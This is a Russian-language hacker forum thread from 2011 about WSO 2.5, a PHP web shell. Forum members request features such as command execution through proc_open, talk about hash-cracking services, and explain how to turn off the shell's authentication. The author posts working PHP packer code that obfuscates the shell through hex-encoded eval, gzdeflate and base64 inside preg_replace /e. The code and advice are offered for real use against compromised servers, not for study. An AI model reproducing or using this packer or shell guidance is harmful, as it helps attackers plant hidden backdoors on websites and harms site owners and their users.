RDot

RDot (https://rdot.org/forum/index.php)
-   Релизы/Releases (https://rdot.org/forum/forumdisplay.php?f=11)
-   -   WSO 2.5 (web shell) (https://rdot.org/forum/showthread.php?t=1085)

Svet 10.01.2011 16:46

jQuery надо еще прикручивать будет. А это доп. вес...

SynQ 10.01.2011 16:57

Цитата:

Сообщение от b3 (Сообщение 12292)
Хотелось бы в новой версии видеть сортировку таблицы файлов на жаваскрипте, без перезагрузки страницы.
http://tablesorter.com/docs/
Если автор не возражает могу сам прикрутить и кинуть на перепроверку исходного кода.

Проще поставить TableTools, если firefox используешь, - будет сортировка везде, а не только в WSO.

hard 10.01.2011 17:50

Сортировка легко и быстро пишется на голом JS без всяких jquery.
SynQ, классная вещь

ТС, было бы неплохо прикрутить выполнение команд через proc_open и expect_popen!

b3 11.01.2011 14:25

имхо поиск хэшей по сервисам можно вообще убрать, да и crackfor.me ввели гавеную капчу которую я с 50го раза ввожу верно, хоть бы уже самопальную капчу соорудили под стиль сервиса.

recfrf 11.01.2011 23:49

Цитата:

Сообщение от Nightmare (Сообщение 11847)
Шикаарно, подарок на новый год, давно ждал, щас буду тестировать в боевых условиях.

Как и советовал грей. Отлично, что на это было обращено внимание.

Единственное чё, oRb, ты бы всё таки выложил свой пакер, через preg_replace/e, я смотрю он хитрый, там смешанный HEX код с base64 сделан, пригодится.

зачем пакер, там же все просто руками 5 сек делается, начало eval(base64_decode( и конец )); в hex и все.

b3 12.01.2011 12:47

recfrf хекс не сжимает данные, а наоборот увеличивает на 40 или 60% не помню точно.

oRb 12.01.2011 13:04

Да, там все просто.
PHP код:

<?php
$header 
'<?php # Web Shell by oRb
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = \'FilesMan\';
$default_use_ajax = true;
$default_charset = \'Windows-1251\';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\''
;

$footer '\'\x29\x29\x29\x3B",".");?>';

$content php_strip_whitespace('in.txt');
$content trim(preg_replace('/<\?(php)?/'''$content));
echo 
$header base64_encode(gzdeflate($content9)) . $footer;


bazowsky 15.01.2011 10:38

Выключить авторизацию, по $auth = 0; невозможно?

oRb 15.01.2011 12:26

Достаточно просто закомментировать $auth_pass

nemoy 18.01.2011 03:48

а можно как то с помощью шелла при выполнении команды - например в php разделе - получить только ответ команды без оболочки шелла
тоесть например пишу я в раздере php
print 'hello';
- и в ответ получаю только hello без остального кода шелла?


Часовой пояс GMT +3, время: 18:05.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot